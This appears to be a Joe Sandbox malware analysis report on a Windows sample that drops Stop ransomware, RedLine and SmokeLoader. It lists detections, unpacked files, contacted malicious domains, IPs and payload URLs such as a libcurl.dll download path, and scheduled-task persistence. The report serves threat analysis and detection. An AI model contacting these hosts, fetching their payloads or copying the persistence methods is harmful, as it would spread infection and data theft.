C:\Users\user\AppData\Local\Temp\2560.exe	67%	ReversingLabs	Win32.Ransomware.Stop
C:\Users\user\AppData\Local\Temp\336E.exe	81%	ReversingLabs	Win32.Trojan.RedLine
C:\Users\user\AppData\Local\Temp\5898187.dll	18%	ReversingLabs
C:\Users\user\AppData\Roaming\dbjigst	85%	ReversingLabs	Win32.Trojan.SmokeLoader
C:\Users\user\AppData\Roaming\nsis_uns5aa2a3.dll	62%	ReversingLabs	Win64.Trojan.Generic

Unpacked PE Files

Source	Detection	Scanner	Label	Download
18.2.ngentask.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1252166	Download File
16.3.226F.exe.d030000.1.unpack	100%	Avira	HEUR/AGEN.1252166	Download File
14.2.336E.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1213203	Download File
16.3.226F.exe.d030000.0.unpack	100%	Avira	HEUR/AGEN.1252166	Download File
13.3.dbjigst.2c50000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.2.dbjigst.2c30e67.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
36.0.Library.exe.a20000.0.unpack	100%	Avira	HEUR/AGEN.1250389	Download File
13.2.dbjigst.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.aw9Ynwqd1x.exe.2bf0e67.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.3.aw9Ynwqd1x.exe.2c00000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
17.2.2560.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
0.2.aw9Ynwqd1x.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
16.2.226F.exe.2f20000.2.unpack	100%	Avira	HEUR/AGEN.1228718	Download File

Domains

Source	Detection	Scanner	Label	Link
potunulit.org	11%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://potunulit.org/	0%	URL Reputation	safe
http://potunulit.org/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id19Responseon	100%	URL Reputation	phishing
http://tempuri.org/Entity/Id19Responseon	100%	URL Reputation	phishing
http://tempuri.org/Entity/Id12Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id12Response	0%	URL Reputation	safe
http://tempuri.org/	0%	URL Reputation	safe
http://tempuri.org/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id2Response	0%	URL Reputation	safe
http://ns.adobe.c/g	0%	URL Reputation	safe
http://tempuri.org/Entity/Id21Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id9	0%	URL Reputation	safe
http://tempuri.org/Entity/Id8	0%	URL Reputation	safe
http://tempuri.org/Entity/Id5	0%	URL Reputation	safe
http://tempuri.org/Entity/Id7	0%	URL Reputation	safe
http://tempuri.org/Entity/Id6	0%	URL Reputation	safe
http://tempuri.org/Entity/Id19Response	0%	URL Reputation	safe
http://novanosa5org.org/	0%	URL Reputation	safe
http://golilopaster.org/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id15Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id15Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id14V	0%	URL Reputation	safe
http://tempuri.org/Entity/Id6Response	0%	URL Reputation	safe
http://bulimu55t.net/	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
http://tempuri.org/Entity/Id9Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id9Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id20	0%	URL Reputation	safe
http://tempuri.org/Entity/Id20	0%	URL Reputation	safe
http://tempuri.org/Entity/Id21	0%	URL Reputation	safe
http://tempuri.org/Entity/Id22	0%	URL Reputation	safe
http://tempuri.org/Entity/Id1Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id10	0%	URL Reputation	safe
http://tempuri.org/Entity/Id11	0%	URL Reputation	safe
http://tempuri.org/Entity/Id11	0%	URL Reputation	safe
http://tempuri.org/Entity/Id12	0%	URL Reputation	safe
http://tempuri.org/Entity/Id12	0%	URL Reputation	safe
http://tempuri.org/Entity/Id16Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id13	0%	URL Reputation	safe
http://tempuri.org/Entity/Id14	0%	URL Reputation	safe
http://tempuri.org/Entity/Id15	0%	URL Reputation	safe
http://tempuri.org/Entity/Id16	0%	URL Reputation	safe
http://tempuri.org/Entity/Id16	0%	URL Reputation	safe
http://tempuri.org/Entity/Id17	0%	URL Reputation	safe
http://tempuri.org/Entity/Id18	0%	URL Reputation	safe
http://tempuri.org/Entity/Id5Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id19	0%	URL Reputation	safe
http://tempuri.org/Entity/Id10Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id8Response	0%	URL Reputation	safe
http://soryytlic4.net/	0%	URL Reputation	safe
http://soryytlic4.net/	0%	URL Reputation	safe
http://drampik.com/lancer/get.php	11%	Virustotal		Browse
89.208.103.88:37538	6%	Virustotal		Browse
http://109.206.243.168/upload/libcurl.dll	3%	Virustotal		Browse
http://109.206.243.168/upload/libcurl.dll	0%	Avira URL Cloud	safe
http://drampik.com/lancer/get.php	100%	Avira URL Cloud	malware
89.208.103.88:37538	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
potunulit.org	188.114.97.3	true	true	11%, Virustotal, Browse	unknown
api.2ip.ua	162.0.217.254	true	false		high
transfer.sh	144.76.136.153	true	false		high
gekjegoudn6i5fbces.jomf6mtobkl32eai1qwqxsxpnfyv2s	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://potunulit.org/	true	URL Reputation: safe URL Reputation: safe	unknown
http://novanosa5org.org/	true	URL Reputation: safe	unknown
http://golilopaster.org/	true	URL Reputation: safe	unknown
http://bulimu55t.net/	true	URL Reputation: safe	unknown
http://drampik.com/lancer/get.php	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
89.208.103.88:37538	true	6%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://109.206.243.168/upload/libcurl.dll	true	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://soryytlic4.net/	true	URL Reputation: safe URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultP	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	ngentask.exe, 00000012.00000002.460489461.0000000003671000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.0000000004681000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.000000000469E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	ngentask.exe, 00000012.00000002.466719826.000000000469E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id19Responseon	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: phishing URL Reputation: phishing	unknown
http://tempuri.org/Entity/Id12Response	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://tempuri.org/	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://tempuri.org/Entity/Id2Response	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ns.adobe.c/g	ngentask.exe, 00000012.00000003.456193929.000000000196C000.00000004.00000020.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.459451684.000000000196E000.00000004.00000020.00020000.00000000.sdmp, ngentask.exe, 00000012.00000003.456098286.000000000196B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id21Response	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id9	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000367E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id8	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id5	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id7	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id6	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id19Response	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id15Response	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://tempuri.org/Entity/Id14V	ngentask.exe, 00000012.00000002.466719826.00000000046A4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id6Response	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ip.sb/ip	226F.exe, 00000010.00000003.367401202.000000000D030000.00000004.00001000.00020000.00000000.sdmp, 226F.exe, 00000010.00000003.469890360.00000000016EB000.00000004.00000020.00020000.00000000.sdmp, 226F.exe, 00000010.00000002.479891077.00000000016F2000.00000004.00000020.00020000.00000000.sdmp, 226F.exe, 00000010.00000003.369928370.000000000D032000.00000040.00001000.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.456297712.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/sc	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id9Response	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000367E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	ngentask.exe, 00000012.00000002.466719826.000000000469E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id20	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://api.2ip.ua/N	2560.exe, 00000011.00000003.362777696.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, 2560.exe, 00000011.00000002.364169041.00000000007E1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id21	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id22	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id1Response	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=	ngentask.exe, 00000012.00000002.460489461.0000000003671000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.0000000004681000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.000000000469E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/trust	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id10	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id11	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000367E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://tempuri.org/Entity/Id12	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://tempuri.org/Entity/Id16Response	ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id13	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id14	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id15	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id16	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id17	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id18	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id5Response	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id19	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id10Response	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id8Response	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/envelope/	ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://search.yahoo.com?fr=crmas_sfpf	ngentask.exe, 00000012.00000002.460489461.0000000003671000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.0000000004681000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.000000000469E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1	ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
144.76.136.153	transfer.sh	Germany	24940	HETZNER-ASDE	false
188.114.97.3	potunulit.org	European Union	13335	CLOUDFLARENETUS	true
109.206.243.168	unknown	Germany	209929	AWMLTNL	true
162.0.217.254	api.2ip.ua	Canada	35893	ACPCA	false
89.208.103.88	unknown	Russian Federation	42569	PSKSET-ASRU	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	791295
Start date and time:	2023-01-25 09:41:05 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 25s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	aw9Ynwqd1x.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	43
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@30/14@4/5
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 62.2% (good quality ratio 54.6%) Quality average: 64.6% Quality standard deviation: 34.4%
HCA Information:	Successful, ratio: 99% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
TCP Packets have been reduced to 100
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, login.live.com, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:42:17	API Interceptor	1524x Sleep call for process: explorer.exe modified
09:42:40	Task Scheduler	Run new task: Firefox Default Browser Agent 3F21743AEE756304 path: C:\Users\user\AppData\Roaming\dbjigst
09:43:30	API Interceptor	33x Sleep call for process: ngentask.exe modified
09:44:35	Task Scheduler	Run new task: svcupdater path: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
09:45:37	API Interceptor	44x Sleep call for process: powershell.exe modified

Process:	C:\Windows\System32\dllhost.exe
File Type:	CSV text
Category:	modified
Size (bytes):	3941
Entropy (8bit):	5.3577599206293485
Encrypted:	false
SSDEEP:	96:iqEYqGgAo3+aJtIz6cxBAmRvBIQYrjVxmc5qCqKP5t2qBtzG1/qIgE:iqEYqGDeIz6rjjqCqKRt2qBtzG1/qNE
MD5:	42733E87CE0EFB04DBD1645F05E8E116
SHA1:	5CDAE1A1CD7318D6426E438E2EAFEDA651E3B3AA
SHA-256:	D82328B2E33426C19C8B536DC5A21450006D366FC8343B5B2BBD88E6BD84DE7D
SHA-512:	A387B92226C384907A38A766E56CD51A134878915F048C986AE1313D071A1E5F2A84D708C65E1C3CF43360D8EA64CBD11850EA3DEFBE366EEBCE8A5EFF745158
Malicious:	false
